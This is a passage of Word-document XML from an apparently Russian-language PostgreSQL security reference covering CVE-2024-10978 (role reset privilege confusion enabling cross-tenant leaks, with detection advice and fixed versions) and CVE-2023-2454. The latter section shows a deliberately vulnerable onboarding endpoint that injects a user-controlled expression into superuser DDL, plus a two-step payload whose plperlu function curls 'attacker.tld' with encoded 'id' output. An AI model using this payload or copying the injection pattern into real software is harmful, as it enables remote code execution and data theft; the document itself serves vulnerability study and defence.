          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SetUserIdAndSecContext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RestoreUserContext</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) и в plan-cache invalidation (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">src/backend/utils/cache/plancache.c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). До фикса reset-path не вызывал invalidation плана при определённых exception-сценариях; план продолжал использовать «застрявший» role-ID. Фикс — добавление explicit invalidation плана при exception-rollback в SECURITY DEFINER функции и при ошибках в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RESET ROLE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Корневая причина — общая для PostgreSQL: plan-cache оптимизирует производительность, но при изменении контекста (current_role, current_setting, search_path) invalidation должен срабатывать на всех путях, включая error-path. Обнаружение требует анализа sequence запросов с учётом session state, что сложно для статической детекции.</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 (уязвима):</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≤ 17.0, 16.4, 15.8, 14.13, 13.16, 12.20. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Фикс:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 17.1, 16.5, 15.9, 14.14, 13.17, 12.21 (выпущены 14 ноября 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login-роль (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pool_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) должна иметь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на хотя бы две разные роли (типично — на все tenant-роли)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целевые роли (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_A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tenant_B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) имеют разные права на данные (это и эксплуатируется)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Superuser не требуется</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это «горизонтальная» эскалация между tenant-ами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нет требований.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нет специальных требований. plan-cache всегда включён (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">plan_cache_mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> влияет только на стратегию, не на наличие).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> приложение использует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per-request с connection-pooled session. Без pool (новое соединение на каждый запрос) баг не эксплуатируется — reset-path обходится через DISCONNECT.</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 per PostgreSQL Project)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ноября 2024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 17.0, 16.4, 15.8, 14.13, 13.16, 12.20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17.1, 16.5, 15.9, 14.14, 13.17, 12.21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Privilege confusion в SET ROLE / SET SESSION AUTHORIZATION reset-path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Multi-tenant data leak / horizontal privilege escalation</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 стандартный механизм PostgreSQL для делегирования прав, используется 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multi-tenant приложениях (как в уязвимом коде выше — паттерн сам по себе валидный)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административных скриптах (DBA делает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для тестирования прав application-роли)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audit-системах (роль с правом импepсонации для проверки прав)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Признаки атаки (трудно отделить от легитимного использования):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возрастающее число </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">RESET ROLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> записей с следующим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от той же </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">session_user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> но разных tenant-context — типично для уязвимого приложения, не атаки. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сама атака не оставляет уникальных артефактов в SQL-логах</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, потому что использует штатные команды.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Лучший индикатор — application-level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: cross-tenant queries возвращают неожиданные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в результатах. Логи приложения должны валидировать, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> в response соответствует JWT-claim запроса. При несовпадении — алерт.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На версиях PG ≤ 17.0 / 16.4 / 15.8 / 14.13 / 13.16 / 12.20 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_audit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> log с фокусом на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функций под именами SECURITY DEFINER в multi-tenant приложении.</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Уязвимы все ветки PG до фикса 14.11.2024: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Ветка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 до</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16.5</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13.17</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12.21 (EOL ветка, последний фикс)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">На версиях PG ≥ 17.1 / 16.5 / 15.9 / 14.14 / 13.17 / 12.21 атака </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">закрыта</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — reset-path вызывает корректную plan-cache invalidation, current_role гарантированно сбрасывается.</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3.17.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — тот же CVE-2024-10978 с точки зрения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">обхода RLS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (не получения роли). Граница: 3.13.1 — горизонтальная эскалация между tenant-ами; 3.17.3 — чтение данных в обход policy через тот же баг.</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связанный паттерн mis-configuration: SECURITY DEFINER без явного SET role может стать каналом для CVE-2024-10978 (трудно отделить эффекты).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стакинг не помогает (CVE требует sequence в pool-сессии, не одного multi-statement), но релевантен для атак на ROLLBACK/COMMIT отдельной транзакции.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 (Хронология 2024)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — общий контекст 14.11.2024 (CVE-2024-10976, 10977, 10978, 10979 как batch).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рекомендации по multi-tenant архитектуре без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(через application-level filtering и connection-per-tenant).</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CVE-2024-10978 — https://www.postgresql.org/support/security/CVE-2024-10978/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NIST NVD: CVE-2024-10978 — https://nvd.nist.gov/vuln/detail/CVE-2024-10978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«SET ROLE» — https://www.postgresql.org/docs/current/sql-set-role.html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«SET SESSION AUTHORIZATION» — https://www.postgresql.org/docs/current/sql-set-session-authorization.html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Release notes 17.1 (раздел Security Fixes) — https://www.postgresql.org/docs/release/17.1/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R8 (sources/research.md, строки 162–170)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13.2 search_path hijacking + schema_element (CVE-2023-2454)</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До PostgreSQL 15.3 (и параллельных minor-фиксов) команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SCHEMA ... &lt;schema_element&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (форма с вложенными CREATE TABLE / VIEW / INDEX / SEQUENCE / TRIGGER внутри одной DDL-команды) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">не применяли защитный `search_path = pg_catalog`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> к выражениям, ссылающимся на quaфицированные имена объектов. Атакующий с правом CREATE на БД может предварительно создать функцию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и встроить её вызов в DDL, которую впоследствии исполнит admin (как часть мульти-tenant onboarding-скрипта, шаблона schema-init и т.п.). Когда admin выполняет CREATE SCHEMA от своей superuser-роли, expressions внутри schema_element вычисляются с привилегиями admin-а — даёт RCE как bootstrap superuser.</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app/api/admin/tenant_onboarding.py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get_superuser_session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@router.post("/admin/tenants/{tenant_id}/init")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def init_tenant_schema(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    tenant_id: str,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    template_name: str,  # имя шаблона, из которого берётся DEFAULT-выражение</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Depends(get_superuser_session),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DBA-инструмент: создаёт схему tenant_X с таблицей из шаблона</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    default_expr = await _load_template_default(template_name)  # из app.templates</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CREATE SCHEMA tenant_{tenant_id}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">          CREATE TABLE accounts (id serial, balance numeric DEFAULT {default_expr});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await session.execute(query)</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default_expr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (загруженного из user-controlled источника — например, JSONB-конфига тенанта, который сам тенант может редактировать) внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">schema_element</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> + admin-сессия = условия для CVE-2023-2454.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload — двухшаговая атака</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(от tenant-роли с правом CREATE на БД, через приложение или прямой SQL):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SCHEMA atk;</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FUNCTION atk.evil() RETURNS numeric LANGUAGE plperlu AS $$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  system("curl https://attacker.tld/$(id|base64 -w0)");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  return 0;</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доступен, потому что admin его установил для legitimate-задач, и USAGE на untrusted-language обычно остаётся у PUBLIC (см. 3.7.2a — typically требует superuser для CREATE FUNCTION; но если admin уже создал SECURITY DEFINER-обёртку, доступ открыт). Альтернативно atk.evil() может быть на trusted plperl/plpython3u с менее опасным телом (для отладки) — RCE сработает при triggering под admin-привилегиями.</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(атакующий настраивает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template_name</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> так, чтобы в JSONB-config попал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и инициирует tenant-onboarding):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template_name = "evil_template"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># содержимое в app.templates['evil_template']['default_expr']:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># "atk.evil()"</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(admin-сессия запускает):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE SCHEMA tenant_42</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  CREATE TABLE accounts (id serial, balance numeric DEFAULT atk.evil());</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
